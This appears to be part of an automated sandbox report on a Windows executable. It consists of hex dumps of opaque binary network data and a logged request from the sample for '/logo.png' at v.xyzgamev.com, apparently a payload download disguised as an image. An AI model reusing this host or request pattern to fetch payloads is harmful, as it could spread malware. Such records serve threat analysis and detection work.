                                                                                            2022-09-02 09:02:35 UTC374INData Raw: 6b 02 6c d3 9d 98 f4 3a 22 5e 8a 5b b5 00 33 0a a7 f7 9a 6c 5a be f8 e7 75 33 b1 8a 6a f5 a5 8d e8 2a 66 8b c7 32 1c 8c 5b db dc 19 66 8c cd 8f 47 05 0a e9 c8 0c 66 88 84 0a c7 af 64 a4 24 02 ac 79 07 46 88 b5 40 1d 5a 0a 3d 4e 9b 74 e9 ce 7a c6 3a b3 f1 ad bf 0a ae 84 d8 db 6d 8b 35 23 dc 20 76 d5 d6 a5 19 04 35 e6 29 39 c8 c6 af 03 50 42 09 5d 71 cf 26 7f 53 ec c4 d7 02 d2 f0 89 f0 18 11 6c 6c 5a 1f 71 08 1f 0e a1 21 5c e1 84 2a 17 bf 6a 17 59 28 27 97 c3 7f 22 6e 12 5e 2a 33 cc d4 9b f7 8b c1 05 d4 90 11 1b a5 86 0a dd 54 e0 e4 4a fb d2 aa 2b fa fa 72 15 c8 a1 c7 69 86 7b df 3a b4 89 47 23 27 4a 16 96 ac 9d cc 21 3d 50 99 ef 3b 31 3b 23 b5 a9 24 49 74 d1 fd 20 7f c2 47 e1 2c 1d d8 2e c0 b3 1c e2 98 96 a6 b9 11 78 c3 36 60 a6 f0 3f c2 48 ec 23 3b 1e 98
                                                                                            Data Ascii: kl:"^[3lZu3j*f2[fGfd$yF@Z=Ntz:m5# v5)9PB]q&SllZq!\*jY('"n^*3TJ+ri{:G#'J!=P;1;#$It G,.x6`?H#;
                                                                                            2022-09-02 09:02:35 UTC377INData Raw: 91 54 a7 67 55 1f d0 9a 96 e1 2e 62 7e b6 82 10 e4 b3 ce 09 4d f0 b4 06 db 1a a1 2c 96 0d 81 d1 f5 58 6d 03 64 a1 2c 49 f2 6f 1f 6a 77 bf b0 3a ad e2 77 0f d5 85 c9 9c 6d 3b 44 67 4a dd 1a 32 d6 49 a8 16 37 91 7c 51 bc b4 a3 fd ba f2 8d 3c 3b 6a 8c 56 97 e3 2f 24 4e b8 0e fb ef e3 2f 9d 93 a9 d2 14 17 42 2d 42 91 84 dd b8 e5 20 64 a1 c5 ac 87 8e f7 00 54 30 e4 ce 83 1d 70 a7 aa 52 67 a1 89 b6 70 18 f2 2e a2 42 64 e5 86 7f 57 a8 64 91 76 c1 e2 27 d4 99 1b 0a 73 e5 a0 22 a8 d4 1b ef ce 88 a4 1f da 8c 7b 98 77 7d 88 81 d4 db 82 a5 bb 28 11 8e 4c d4 16 6e 48 80 b3 4d 9c 79 56 95 30 17 a5 b5 0c 29 87 b6 2f b4 c4 6f 91 58 67 41 4b 85 f4 6e 18 6a ab d6 16 c9 06 98 50 5f 5d 4b 0e 4a 26 9e 37 2e 68 f0 c1 9d 16 db e0 69 6c e1 a7 ee e3 df 93 28 b6 f0 c7 e4 04 6d 65
                                                                                            Data Ascii: TgU.b~M,Xmd,Iojw:wm;DgJ2I7|Q<;jV/$N/B-B dT0pRgp.BdWdv's"{w}(LnHMyV0)/oXgAKnjP_]KJ&7.hil(me
                                                                                            2022-09-02 09:02:35 UTC383INData Raw: ce de 21 c9 a4 e1 ea 02 eb 64 a4 39 9d 6a d1 08 b0 be 72 39 fd ea 69 40 4b 29 9c 51 e4 11 5e 64 2e 2a 71 79 b4 56 cb 26 ab 1e c4 f6 e7 40 50 32 e8 bb 73 ed c5 8c e1 f8 9b ae 04 3b 97 a6 42 fd 73 12 5f ea 57 07 22 50 04 a7 63 91 56 aa 6d a6 9f 5e 3d bb 34 38 37 54 78 39 c8 f6 7a a4 24 8a 44 1d b5 8f cc 83 d2 54 d0 16 e6 4e 43 ac d4 40 b8 32 7c aa f4 b0 5d 16 a9 20 66 a4 c0 c9 30 bd 9a 85 b1 3c e6 7d 49 38 e2 38 f4 6a 29 1a 92 5f e2 1f 97 cc 30 5b a6 23 65 2c 82 9d 4f 62 a7 bd 04 ac 85 b4 14 2f 90 1b 25 10 96 a4 d4 0b 07 dc 4c 8a ef 22 6e b2 29 bd 66 eb 93 5e c9 75 d4 e2 e7 e4 ee 1f 18 bb 6b bd 64 b2 32 97 28 c1 5d 93 f0 f5 80 12 9f 4d b7 f2 c4 99 ed 8e af 35 06 f0 fc 31 8b 46 b5 12 c2 6f d3 4e 00 4d 60 ac 7e b1 09 55 e6 60 5e dd 31 be 22 e2 8d 0b e4 6b e3
                                                                                            Data Ascii: !d9jr9i@K)Q^d.*qyV&@P2s;Bs_W"PcVm^=487Tx9z$DTNC@2|] f0<}I88j)_0[#e,Ob/%L"n)f^ukd2(]M51FoNM`~U`^1"k
                                                                                            2022-09-02 09:02:35 UTC388INData Raw: 57 5c 51 18 25 9a d5 63 81 37 d5 e6 73 0a ec 9b 2b e6 23 f1 bc 49 86 88 b3 59 3e af 94 39 9b e1 63 3b 36 b8 04 94 f6 cb a4 6a 3a 37 81 ea 3f ac e3 88 d5 99 60 4d 4e be 69 69 56 68 a9 13 96 e0 64 37 ff 6c f2 2c d4 02 65 a3 68 b1 dc 39 d6 10 5a e8 ec 39 b9 d8 c7 e3 6f 1b b5 53 62 37 2e 75 e8 69 fe a3 2f 2d 68 18 4d 3e 63 eb 21 ac fc 49 a1 ae 22 c8 10 c5 2e a7 16 63 13 c9 a6 6a 9e fd 24 2e 61 3f f2 3c 2a 18 16 e3 37 fa f6 e4 fd b8 ba 31 73 ac 34 a6 35 60 4a eb cd 6c f8 b3 e6 f9 f9 d5 13 ad 35 3c 30 fa 6b 86 4b e6 b0 7c b2 ce d8 cd cb 2e 2c 03 0d a9 d5 7b e2 ca a3 01 49 63 10 e8 6e 52 65 15 5e 67 a0 e2 08 d2 37 22 6c 96 c8 7c a1 fb 65 e9 16 54 d0 4d 2c 19 50 62 af 6a 9e 14 e8 16 d9 48 c7 a1 1b 55 f0 d5 af 8a 26 90 f8 46 35 c0 d8 50 d8 30 f4 6d ac 61 26 3a 52
                                                                                            Data Ascii: W\Q%c7s+#IY>9c;6j:7?`MNiiVhd7l,eh9Z9oSb7.ui/-hM>c!I".cj$.a?<*71s45`Jl5<0kK|.,{IcnRe^g7"l|eTM,PbjHU&F5P0ma&:R
                                                                                            2022-09-02 09:02:35 UTC394INData Raw: e6 49 37 2e 9a 6a 85 7b a6 10 2f aa db 2c 59 ae b7 7b ea af 2e 26 cf 6e cf ab 7a 1a 93 3b 66 ea af 37 a1 6f a6 8e 87 b1 af a1 c0 ce 6e 07 cb 7a 52 4a c2 79 79 c2 69 39 0f 71 09 24 ac 33 36 af 57 bf b6 c3 f7 2b 24 a5 db f2 fc fe 32 32 49 ce 27 13 f7 a9 d6 c0 78 11 39 07 e8 af 2a 15 da 0e 3e d1 a6 87 46 21 26 09 26 e5 01 a9 51 77 7d f2 88 57 94 28 5e dd f8 3a e3 a5 0c 45 a7 7a f8 2a 51 a9 19 21 67 2b 65 26 97 f3 85 17 f2 36 d2 87 7a 50 98 7d 64 ce e6 a0 0e 8a f1 fe 96 d6 68 dd 53 4b 0a f3 f1 d6 0d 3f a9 45 f7 e1 df 2b e1 15 1d 1b f9 77 6d 38 59 9f 47 2e 1f 7d 0d 2a 5b 7c 45 d3 17 94 59 81 4f 2c e1 ae 25 14 54 b2 f2 20 ef e5 2f 20 d8 36 c7 63 6c ef 6e e8 b2 7a 07 ee 48 e1 e2 7f 7e e2 ef a0 22 68 e0 09 86 e8 24 59 54 6d 67 ed 26 6b 83 a7 39 bd 42 6e 5c 71 06
                                                                                            Data Ascii: I7.j{/,Y{.&nz;f7onzRJyyi9q$36W+$22I'x9*>F!&&Qw}W(^:Ez*Q!g+e&6zP}dhSK?E+wm8YG.}*[|EYO,%T / 6clnzH~"h$YTmg&k9Bn\q
                                                                                            2022-09-02 09:02:35 UTC399INData Raw: 6b 2e 2b e1 a0 e4 67 43 c2 cc 16 23 3f a4 57 5d 8f ff 12 75 47 45 a8 7d 9f 6e 93 60 bd 72 47 95 b8 b0 7e 55 78 96 e0 19 7b b2 85 c1 0e 61 d5 d6 3f 90 00 28 6f a4 18 29 1f 3d f2 bc ab ba 77 ba a8 6a 1d d7 54 4e 78 d3 16 59 d0 d5 e2 d4 a4 0d cb 04 ef cd 8f cd 76 a7 f6 ab 27 c6 d7 ba a6 65 98 6d 63 dd 10 89 87 6d 91 e8 dd 9e 6e d0 86 65 d8 c1 a0 4f 41 08 44 ba 0a d9 1f 42 29 a4 71 bc 71 bf 72 90 82 b5 be 61 b3 d2 84 2c 70 e2 6b 28 2b 07 c6 cb 9e 62 be b0 26 72 6d 03 cd cc a3 22 4d cc c5 a3 6c 7c ca 9c 24 06 0e 74 a5 78 cc a5 00 e1 e8 a3 74 73 c4 4f b7 2a 67 c6 e8 89 0e e2 30 6d df 6d 11 86 b2 78 b7 44 db 48 e2 42 a8 dd 6a 12 ed a9 ed ea 65 49 ce 5c 15 44 1c b2 88 fc ef a1 8d ff dd d4 5e 13 5c 14 ec 20 e2 ab 55 90 eb 10 57 f0 f3 ab 24 28 65 24 6f 34 73 ed 41
                                                                                            Data Ascii: k.+gC#?W]uGE}n`rG~Ux{a?(o)=wjTNxYv'emcmneOADB)qqra,pk(+b&rm"Ml|$txtsO*g0mmxDHBjeI\D^\ UW$(e$o4sA
                                                                                            2022-09-02 09:02:35 UTC415INData Raw: 57 95 17 b5 f9 14 8c bc 7b 23 8e fe 0c ea f9 cb 27 b3 b1 69 29 4d 52 3b 70 82 1a 01 7f b3 84 2f 29 6a e7 6b d9 d7 54 8b 36 1a e8 21 51 69 a6 ea 1f 03 32 cf 5a b7 45 62 e4 c4 88 eb ff 5b 1f 91 a6 d9 0b b4 07 17 28 ba 2a a6 ec 96 50 aa 8f 05 69 d3 57 68 9b 84 79 e7 1a a3 50 4b f5 f8 ca af 99 2d f6 88 0e 14 c5 5c 6a 93 93 7c 87 5c 1e e7 93 68 91 68 91 cf 36 5e 49 a5 9d 83 52 1e 45 c6 22 b5 63 fe c1 3c f0 5e 91 38 a9 e7 33 0a 21 06 ee bd 64 7d 73 67 2a b6 2c c7 de c2 76 13 e0 5c d6 d2 9d de 00 fe 36 7f 54 19 32 fb 8f 50 b2 1b ae 24 93 21 f5 40 94 2d 91 16 d9 7f f5 5e a2 2b d2 5b 1f 30 70 8f 04 49 a3 3e 48 c1 32 35 91 b0 f0 8f 04 23 c9 3e 7e e3 a6 3b 2b af c9 bd 55 4e b3 58 d5 21 80 9c 8d e9 e6 3d c2 e8 31 0c cd 5f 7e c2 fb 36 fb 18 d2 32 f8 0c b7 a5 6f e4 0c
                                                                                            Data Ascii: W{#'i)MR;p/)jkT6!Qi2ZEb[(*PiWhyPK-\j|\hh6^IRE"c<^83!d}sg*,v\6T2P$!@-^+[0pI>H25#>~;+UNX!=1_~62o
                                                                                            2022-09-02 09:02:35 UTC416INData Raw: 42 10 5e 50 ee 13 a2 d2 c1 90 5c 9e 6a 09 ad ed 18 c2 b4 d1 10 e6 7e 5b 8d 28 c4 8a 69 e6 6f 13 94 29 29 e7 f7 30 cb 37 56 d2 07 00 15 90 12 2a ff 70 e5 d3 a3 b4 c8 22 e6 e9 1f 99 60 e7 62 6a e5 c9 a9 4f 68 5e 13 a7 9b 9e 64 fc f0 ab a1 77 7e a8 ac e7 5f ef a7 6a 8d 7a 67 68 68 a7 c0 c0 6a 80 88 e2 2c 89 0f ed 2a a2 2d af 1a b4 cd 22 ff dc d8 f7 e9 5c df 2e 16 1f 6a 77 77 a7 28 45 ca a7 a2 aa 62 d7 4f 34 ed 3c 27 73 64 24 47 72 9c 8b f1 6f 15 b2 f0 f2 b7 ac e5 ec 53 2c b6 cc 66 d0 88 3b 63 d6 5f 3a f5 38 c5 55 af 2a f0 90 4e 2e 42 9d f3 2c 95 18 e7 fd 64 7b e2 e2 68 0e 40 a4 8b 8a 60 1d 9c 39 55 fe da 6f 18 ca bf 36 33 a8 a0 e7 4a 45 e4 ea ee 5f db e9 5d 6f 2d 36 03 a6 59 b3 c1 e9 dc 8b c8 12 24 a6 79 10 40 6a a0 2f e1 87 5e 38 e4 e9 4b 07 a2 6e d0 1e 27
                                                                                            Data Ascii: B^P\j~[(io))07V*p"`bjOh^dw~_jzghhj,*-"\.jww(EbO4<'sd$GroS,f;c_:8U*N.B,d{h@`9Uo63JE_]o-6Y$y@j/^8Kn'
                                                                                            2022-09-02 09:02:35 UTC422INData Raw: f3 23 a3 24 5c 16 62 c6 80 21 af dd 90 e6 69 03 84 af d6 1e a4 2c 68 07 c4 27 1b 1a a2 2f 66 0a 37 45 14 a3 02 ee a7 6a 22 2f 13 3b bf 57 86 4b b5 0c c5 38 68 a1 fb 32 68 c1 db 12 fb 2f 9a aa 7c 04 e8 70 c7 a0 e8 44 7b 9c 52 ca f3 3a dc 96 88 ce 39 7c c7 04 7d a4 a9 1f d4 54 c3 12 f3 6e dc 2d ae a1 ea aa ad 8c 40 a1 62 e2 2f ab a4 b8 91 06 3c 56 47 d3 d1 6a 2f 21 5c e6 ea 52 fd 36 e0 2b 27 b6 b2 39 75 ea cd 85 23 22 26 2a 99 6a 27 15 ef 19 ac a3 51 e3 18 13 c6 8a 03 24 7d 5a e6 8a 86 00 7b 74 66 42 a3 2e ba f7 26 13 c1 3c db 11 6b ff b3 73 c1 d7 7d 3b 2f ea 24 b0 fd 33 fe 41 8c 83 4c 0f c0 61 e9 aa cf 88 21 09 4c 6b e0 6c 11 40 3b a8 d9 d7 c5 3a 15 37 c1 78 d6 f3 a2 e5 e9 b1 f8 6b b1 3e ee a3 68 a7 6b 29 3a 7c 00 cb 11 99 2c 6a cf 36 c7 3e d2 bb 1b ce d5
                                                                                            Data Ascii: #$\b!i,h'/f7Ej"/;WK8h2h/|pD{R:9|}Tn-@b/<VGj/!\R6+'9u#"&*j'Q$}Z{tfB.&<ks};/$3ALa!Lkl@;:7xk>hk):|,j6>
                                                                                            2022-09-02 09:02:35 UTC423INData Raw: 2c ed 25 eb 05 d5 f6 b6 22 f8 f2 a5 4a 86 7f bb fb 2c 07 0f c2 d8 7f 0f 1a a1 21 27 b5 e1 e3 5a 09 a1 2f b9 4d d1 25 67 95 df 2d 9e d4 30 65 ff 38 82 06 a1 eb 45 c4 f0 b6 ab 7e 83 5d 6a 00 36 5c fd 2b 5a ca ad eb e4 ae eb 86 88 e1 a5 d3 96 85 06 7b 1b 07 6a 5f 1e aa 8d 0c 6a 28 6a 8d 79 5c dd 10 b8 20 3e 6b 8f 36 13 22 10 a7 7e 56 3c 60 21 67 59 46 50 b2 06 c9 6a b0 02 3b bc 92 6a 9f ad 85 a8 43 4e 6f 67 de 09 a7 61 73 cf f9 f9 e0 e1 d4 3d 1c f2 df 01 38 77 6e c0 de f3 39 6c 2f eb 33 f1 7b ca f9 d8 37 74 f8 09 5c 55 4f bb 16 4a dd ae 7d 1f dd b0 a7 3d 48 af 18 77 cd a4 6c fc 7e f7 f5 e6 66 a5 f2 f9 61 e8 b3 a2 f3 2d ec e4 69 6c ec 2b a0 21 33 1b 3a 36 82 a4 eb ac 77 87 d3 66 ec 20 25 ec e9 07 80 5f d3 2a c7 0a 63 fb a4 6d 90 49 97 48 3f 23 ee d5 12 6e d4
                                                                                            Data Ascii: ,%"J,!'Z/M%g-0e8E~]j6\+Z{j_j(jy\ >k6"~V<`!gYFPj;jCNogas=8wn9l/3{7t\UOJ}=Hwl~fa-il+!3:6wf %_*cmIH?#n
                                                                                            2022-09-02 09:02:35 UTC439INData Raw: 7d 7e d3 f6 19 61 f8 0e c3 af 75 7d c3 94 3f 0c 85 4e 4c 24 e9 32 3c 21 6e a3 ac 77 06 ef 2c d6 c4 63 cb 0f 42 8d 80 ae 44 0d 2c 25 2b ab 76 3a e7 ab 2c 00 cf 56 eb 02 f7 ab 56 32 83 2f b0 3c c8 55 b6 a0 d5 da fe f1 dc 11 c6 00 67 96 39 49 76 ba eb ad dd 9b e6 81 8d ee 23 d5 0a 53 0c 69 1d c5 30 d4 45 4c 5d 18 fe 98 7e 18 83 bf 1a 4d bd 1b 58 c2 81 c8 87 e4 ed a5 e3 ed 64 65 27 4a 03 ea a2 23 60 27 29 ab 2e 26 cf 0e 6c 34 3a a9 a0 4a 2f d6 bf e2 ae 6c 98 53 a0 fc 33 68 bb 40 97 66 23 62 22 6f b4 51 c6 a8 2c a4 21 ab 6a 0a a3 b5 8b 29 dc b3 a6 8b f5 ec 49 c6 63 e6 d7 9d e4 22 0f 42 8f c3 34 78 8f 42 b7 52 c8 ac 01 ce 14 d9 33 68 3a 54 12 1d b3 2a cf a9 40 22 eb 03 7a c6 9f 32 3c 9d ff 36 9f 11 cc 7b b8 18 48 65 a9 c7 49 b3 ef f8 7d b9 de c9 36 9d 64 bf 87
                                                                                            Data Ascii: }~au}?NL$2<!nw,cBD,%+v:,VV2/<Ug9Iv#Si0EL]~MXde'J#`').&l4:J/lS3h@f#b"oQ,!j)Ic"B4xBR3h:T*@"z2<6{HeI}6d
                                                                                            2022-09-02 09:02:35 UTC455INData Raw: 28 0e cc 8a 3a 64 a4 a5 29 a2 21 2d 6a 37 0a 1f 8b 0f 6b 33 0e 38 c8 a9 28 fb 72 7a fd 2c 66 e2 c9 f8 5f aa 3a f8 2c a6 41 01 4b 41 64 ca f8 0c 84 d0 58 10 e2 a5 2c 1f 47 7b a7 6a 4e a3 95 78 a7 22 62 67 6b 02 bb ba 43 b1 8f 95 17 da d3 16 ee ec 27 29 a2 6b a7 6a a7 e9 cc 83 a9 e1 8c 6e 0c e6 29 48 00 e8 82 15 f9 4b 7f 92 93 7c b2 5d b7 32 57 2d 5b 69 d8 54 ee db e1 92 a0 f8 16 91 80 53 61 22 66 bf df 76 6d 97 b8 78 e1 2f ac 71 f2 0a db 7a 64 e1 f3 1a db 7e 60 23 ec 97 d3 4e cf 6f 2f 43 7b 13 6f ef 66 a4 3c 3f ec 21 90 44 73 2e 57 d2 cf 02 a5 78 b7 27 f1 71 51 d5 cd 9d 3a d4 86 f0 eb 49 74 d6 e8 9b a3 45 65 71 67 ef c1 88 91 45 80 55 67 2b 6b 7f f3 5d a3 6a 5b 69 7f 5a e9 ee 85 6a 4f 5f 7a 4b 86 6a 55 97 84 8e 2b 0e 0e 96 56 af 5c d1 0e 4f ab ea a6 6f 22
                                                                                            Data Ascii: (:d)!-j7k38(rz,f_:,AKAdX,G{jNx"bgkC')kjn)HK|]2W-[iTSa"fvmx/qzd~`#No/C{of<?!Ds.Wx'qQ:ItEeqgEUg+k]j[iZjO_zKjU+V\Oo"
                                                                                            2022-09-02 09:02:35 UTC471INData Raw: 96 2f c4 39 da 53 a9 10 c1 f3 23 46 49 9c 9c a0 1f 12 e9 aa 44 29 8c 61 26 7a 32 53 15 a7 e5 c6 69 04 a0 e1 b7 ff e5 76 fc 61 2c ac 64 eb b4 40 02 d2 1b f2 a8 6a ac eb 56 1e ab e5 c4 aa f3 21 19 eb 9b 23 e8 1d 61 64 da 92 b1 6c fe a8 fa f4 ef 8b 8d 4c b5 15 d8 16 dc 6d 57 e9 5b 1a 83 0e dc 16 e4 61 25 80 c0 62 eb 22 20 29 6f 15 d8 7b fa ad eb 45 0f 52 22 68 a7 7c 7e da 2d e5 2a a2 13 3d 85 21 f3 30 68 af b9 02 de a8 dd 13 3d 30 e6 7d 8a 5b e2 25 bc 47 11 ee eb a9 62 0c 13 1d 85 23 3e f3 3b 77 39 73 c9 02 3b 74 53 9c 91 65 c1 39 de 5e 6d c1 80 4e 41 92 bb cb 45 7a f5 4a 9e 0c d8 3e c0 91 30 ff 5c fb 89 a7 8b 05 85 ee 69 21 65 ab 4c 82 ec a9 ef e1 6a 2f 63 1b c4 7d b3 44 5e a7 2a 52 cc 3b 3a 81 16 09 83 02 7f 5a 23 6d 28 e6 d2 70 4b 97 c1 71 d6 71 ce 53 c8
                                                                                            Data Ascii: /9S#FID)a&z2Siva,d@jV!#adlLmW[a%b" )o{ER"h|~-*=!0h=0}[%Gb#>;w9s;tSe9^mNAEzJ>0\i!eLj/c}D^*R;:Z#m(pKqqS
                                                                                            2022-09-02 09:02:35 UTC487INData Raw: 0d de 79 aa a6 ab 67 7b 76 aa ae a3 67 c0 14 b3 67 6f c2 0a b2 1f c7 67 ca 0a 0d dd da 0a a4 09 c7 79 d4 0a ac 01 c7 40 96 11 c7 6d c0 0a b0 1d c7 5a 66 9b a3 ee 26 6b a7 6a 47 65 9d 5c 44 6b 26 eb b8 14 c7 65 c8 08 e4 2b c3 be e2 7c 46 08 37 79 44 0b c4 76 16 45 27 8f 41 88 47 0a c6 8a af 81 b7 79 a5 6e a6 ec 24 08 c7 7a a6 69 b5 62 af 6d a9 65 ab 65 a9 65 af 06 c4 64 a8 66 a8 4c 87 ad 6b 66 0d c2 c5 0e a0 09 c7 6e c3 0a a2 0f c7 3c f7 0c c7 0b c1 65 4f 8a ad 00 c7 66 fe 5f c7 64 c9 0a b7 1a c7 7e d3 0a bf 27 92 0a bb 16 c7 4a e7 0a 8f 22 c7 5a c2 5f c7 52 ff 0a e7 4a c7 3a 97 0a c7 5f 92 0a d7 7a c7 ea 47 0a 07 aa c7 aa 9a f7 c7 8a 27 0a f6 3b 4a 88 c9 04 49 85 c8 05 56 74 4b 06 cb 86 4a 07 ca 87 4d 00 cd 80 4c 01 cc 7e b9 ea 20 6f 82 44 b6 6d b0 62 d1
                                                                                            Data Ascii: yg{vggogy@mZf&kjGe\Dk&e+|F7yDvE'AGyn$zibmeeedfLkfn<eOf_d~'J"Z_RJ:_zG';JIVtKJML~ oDmb
                                                                                            2022-09-02 09:02:35 UTC503INData Raw: 86 0d 97 a5 50 3f 1f a3 ad 3b e0 a5 2d 33 65 36 fa ea f8 a5 3f dd df 08 2c 4d f1 a5 f8 89 8b 63 da 2c ca a5 cc 37 af 52 a1 c0 c2 a5 7a ed b7 ac bf 4d db a5 1c fe f5 20 8e cf d3 a5 7a 62 f5 fb 11 8e 2c a5 5e 5b 17 27 8b 3f 24 a5 63 83 cc 8f 8e b5 3d a5 64 3f ff 49 38 45 35 a5 1e 99 a0 b8 e9 dd 0e a5 9c 5a 44 4a c7 ac 06 a5 5d cb d5 b0 22 6a 1e a5 88 7e e2 3b b3 2f 16 a5 64 d1 62 5f d6 94 6f a5 82 2e e6 c0 83 cb 67 a5 71 aa f9 e1 3f 26 7f a5 90 66 a1 e9 66 0a 77 a5 af 27 8c 0d b5 56 4f a5 88 6a a7 6a a7 6a 47 a5 18 ea a6 69 a1 66 5f a5 98 6a a7 6a a7 6a 57 a5 98 6a a7 6a a7 6a a7 6a cb 69 af 3c a6 5a a7 6a e4 29 e8 25 e9 24 e8 25 f2 3f f3 3e 83 4e a7 6a cf aa 0a ef 26 6b a7 6a d7 09 b4 ea 26 6b a7 6a a7 6a a7 6a c6 0b d5 18 a7 6a a7 6a c5 08 c0 0d a7 6a a7
                                                                                            Data Ascii: P?;-3e6?,Mc,7RzM zb,^['?$c=d?I8E5ZDJ]"j~;/db_o.gq?&ffw'VOjjjGif_jjjWjjjji<Zj)%$%?>Nj&kj&kjjjjjj
                                                                                            2022-09-02 09:02:35 UTC519INData Raw: 73 44 7d d8 a1 5e d6 ab c9 fd 5a 8e b1 7c af a6 77 7e e7 10 75 83 a6 c6 6b 0a 73 da c4 84 4f 08 c3 5d 84 79 b7 e8 58 00 c0 2b 42 be f7 2a 37 c1 9d 6b 5b f6 c7 7a b9 83 23 28 6c 81 ce 24 61 b6 9a 6b ab 0d f1 30 e6 a5 4f 6a bd 78 ae 6a bc 70 be 72 a8 95 5a 87 47 61 7c b3 de 12 cf 0d 90 5c a7 6c 0f a0 de b5 74 7d 87 74 19 eb a6 27 d5 54 a6 1e b7 02 aa 82 4f 72 95 48 ae 70 bc 33 d7 42 ac 91 37 85 f8 18 27 78 95 63 cc 0d c1 bb a7 da c9 1d 94 49 ae 6a bf 06 c8 71 bf 16 d9 70 a7 72 8b 47 be 72 be 7d b1 3a e6 9b 47 6a 46 88 04 ca f5 39 84 42 49 21 9a fe d1 f9 ea cd ae 28 ea 05 7a d8 fa 33 dc 78 97 4c f2 2f 91 aa 39 86 66 2a c3 0b ce 67 a7 6f f6 32 ab 4a cb 27 c2 0e 26 8b c7 66 43 61 5a 9d 4f 6a a6 63 aa 6e ae 31 f0 8f 44 71 cf 18 c5 68 c3 8c 42 6a 96 55 a8 6e 57
                                                                                            Data Ascii: sD}^Z|w~uksO]yX+B*7k[z#(l$ak0OjxjprZGa|\lt}t'TOrHp3B7'xcIjqprGr}:GjF9BI!(z3xL/9f*go2J'&fCaZOjcn1DqhBjUnW
                                                                                            2022-09-02 09:02:35 UTC535INData Raw: 05 68 6e 35 86 a8 72 7e 5a 86 26 f4 aa a8 72 f9 23 79 b0 84 4b 90 a6 6a a7 54 63 ff 8f 8a f9 ec 46 1f 5f 1d c3 95 f6 c4 5c 6e a7 15 dc 6e 1b 32 49 90 b8 61 49 9f 58 89 4b 80 46 40 09 f9 d5 0b c6 05 86 a4 52 1b c2 8b 50 3c f0 82 bd 8d d0 87 ae 52 0d 69 a7 3a 3c a0 a6 5a 73 8f 6e 3e b1 e5 40 94 7f 25 cf 89 4a 86 74 89 72 8a 97 21 3b 8a 6c 46 47 83 4b de 37 c1 e1 46 47 a2 8f 8a 4e 86 95 bd 4a 39 39 4a 47 be 93 8a 4e 86 92 ba 47 ce aa 23 50 ad 97 8a 4e 86 93 bb 47 ca e7 8a f5 e4 9b 8a 4e 86 90 b8 47 c6 eb 8a 7f 1d e8 8a 4e 86 91 b9 47 c2 ef 8a 43 6e 47 bb 9f 86 9e b6 47 de f3 8a 1b 36 43 87 4b 01 f4 b7 47 da f7 8d 40 6a 4a 8e 4b 2a 53 3b 47 86 ab 8d 48 6a 4b 8f 40 2a 01 8a d1 e8 b3 8d 8c 35 33 bb 70 8f 42 8d e6 9c f6 8a 57 7a 47 96 b3 86 42 8d e1 ca 47 d4 e1
                                                                                            Data Ascii: hn5r~Z&r#yKjTcF_\nn2IaIXKF@RP<Ri:<Zsn>@%Jtr!;lFGK7FGNJ99JGNG#PNGNGNGCnGG6CKG@jJK*S;GHjK@*53pBWzGBG
                                                                                            2022-09-02 09:02:35 UTC551INData Raw: e9 49 a4 9e d3 ef 52 1a 24 09 d0 5c 85 69 cb 86 22 ee 25 a4 c7 47 22 17 5f ef 23 e8 4c 02 22 ff b7 ef b7 fe 25 90 de ef 0a 42 22 6f 85 4b 90 5e f5 b8 26 77 3b df 13 e8 91 7c dc 31 a4 42 0f ef 23 e8 9a d4 22 23 ee ef 22 2f 67 e9 1f f4 81 69 03 d8 79 22 4c 81 24 92 dc eb d6 c8 70 ed 25 eb 25 e8 0d 42 a4 36 7b fb e3 be 25 ee a0 ef 2a 62 22 cf 87 e9 71 29 1e c5 94 59 22 b7 ff e9 b6 48 14 60 ac fc 33 e9 b5 49 96 69 5b 16 2c 73 71 2e 24 6a 90 de 98 c1 b5 6c 0d c4 23 e9 92 dc 26 03 4f 71 04 d2 24 3f bd a2 26 ee 25 37 7d eb c2 8a 24 e9 3c f5 26 ee 25 f9 f3 ac 64 aa 2d d7 92 29 e7 12 36 86 a2 e6 eb ab bf 73 90 5e a4 2a 2e a6 a2 76 96 87 66 2a 26 aa 66 c9 81 ee 66 70 84 7a 8c 69 b3 be 7d 40 57 ab 76 83 d5 e1 5f 92 65 90 9f ab 84 72 5e 8f c9 8f ca ab c1 cd 67 ab 46
                                                                                            Data Ascii: IR$\i"%G"_#L"%B"oK^&w;|1B#"#"/giy"L$p%%B6{%*b"q)Y"H`3Ii[,sq.$jl#&Oq$?&%7}$<&%d-)6s^*.vf*&ffpzi}@Wv_er^gF


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            1192.168.2.349754104.21.40.196443C:\Users\user\Desktop\file.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            2022-09-02 09:02:36 UTC558OUTGET /logo.png HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Accept: */*
                                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                            Host: v.xyzgamev.com
                                                                                            2022-09-02 09:02:36 UTC558INHTTP/1.1 200 OK
                                                                                            Date: Fri, 02 Sep 2022 09:02:36 GMT
                                                                                            Content-Type: image/png
                                                                                            Content-Length: 67409
                                                                                            Connection: close
                                                                                            Last-Modified: Wed, 24 Aug 2022 05:04:02 GMT
                                                                                            ETag: "10751-5e6f59c08b027"
                                                                                            Cache-Control: max-age=14400
                                                                                            CF-Cache-Status: HIT
                                                                                            Age: 1822
                                                                                            Accept-Ranges: bytes
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mPbvTAB4qzEGM6i4X7sFkAVLkklwhlVeDk7TK91XmCsxTq6h4EWGG4pGScetjKcaBBRntx0%2FyS45l6CtPPqMRsW1FNeg6G4uwZcAf6w5h8XUqvur%2BEicS2lWtBKh1Xr5Eg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 74451154be5dbbb5-FRA
                                                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
